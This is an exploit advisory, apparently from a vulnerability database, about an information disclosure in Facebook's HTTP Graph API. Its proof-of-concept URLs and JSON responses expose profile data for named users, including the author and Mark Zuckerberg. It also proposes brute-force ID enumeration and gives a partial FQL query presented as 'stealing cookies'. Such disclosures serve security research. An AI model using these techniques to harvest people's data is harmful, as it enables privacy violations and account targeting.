Facebook HTTP Graph API Users ID (and others..) Information Disclosure )

2018.10.06
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Facebook HTTP Graph API Users ID (and others..) Information Disclosure -OAuthException- and Vulnerable (http) to Brute Force Attack # *Vendor*: Facebook.com http://graph.facebook.com # Author: Juan Carlos Garcia (@secnight)(nightsec) ;) # Blog: http://hackingmadrid.blogspot.com http://blog.0verl0ad.com/ http://highsec.es BREIF DESCRIPTION ****************** The Graph API is the primary way that data is retrieved or posted to Facebook. The Getting Started Guide contains an overview of the basics of the API, walks you through using the Graph API Explorer, shows you how names work, how permissions work, what connections are and puts it all together so the rest of this reference make sense. Users Information Disclosure ********************** Anyone can access the data from ANY user due to the release of information that produces the "Graph API" because of the functionality they have given to this API for developers. The "excess" functionality provided in this API make data users are exposed without any need for it any malicious attacker and make a compilation of information (information Ghatering) from the target It is possible to identify people according to their id as we will be seen in the proof of concept and the insecure HTTP protocol also makes it vulnerable to a brute force attack.. Proof Of Concept ( PoC) First *** http://graph.facebook.com/ As you can see, we have a “"GraphMethodException” "error": { "message": "Unsupported get request", "type": "GraphMethodException", "code": 100 Creating an OAuthException ********************** http://graph.facebook.com/00000000000000000000000000000000000000000000 { "error": { "message": "(#803) Some of the aliases you requested do not exist: 00000000000000000000000000000000000", "type": "OAuthException", "code": 803 My Profile ¡!! ;) http://graph.facebook.com/ADMIN.CANGREJOS { "id": "100001678510102", "name": "Juan Carlos Garcia", "first_name": "Juan Carlos", "last_name": "Garcia", "username": "ADMIN.CANGREJOS", "gender": "male", "locale": "es_ES" } And we can also do the REVERSE because we have the id.. http://graph.facebook.com/100001678510102 Mark Zuckerberg CEO Facebook http://graph.facebook.com/zuck { "id": "4",-->WTF???? … The number 4 .. Who is id 1,2,3 ???????? "name": "Mark Zuckerberg", "first_name": "Mark", "last_name": "Zuckerberg", "link": "https://www.facebook.com/zuck", "username": "zuck", "gender": "male", "locale": "en_US" The Reverse http://graph.facebook.com/4 COOKIES A list of cookies that were set for the user as represented in FQL. Facebook Query Language (FQL) Columns Name expires timestamp name string path string uid numeric string value string To access this table you only need a valid access token with basic permissions. Facebook Login makes it easy to connect with users on your app or website. You can use several methods in the JavaScript or mobile SDKs to speed up the registration process and build a functional system in minutes. Stealing Cookies You only need the next SQL Query to extract the cookie SELECT ... FROM cookies WHERE uid = A Note: Additional filters on other columns can be specified but they may make the query less efficient. /Admin http://graph.facebook.com/admin/ "id": "100005597474065", "name": "AD Min", "first_name": "AD", "last_name": "Min", "link": "https://www.facebook.com/ad.min", "username": "ad.min", "gender": "male", "locale": "ru_RU" } Procedure: Open de links given above and you can play .. No hack, No fun ;) Special THANKS : Eduardo Arriols Nuñez .. very good newbie ;) Live Free or Die Hacking

References:



Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top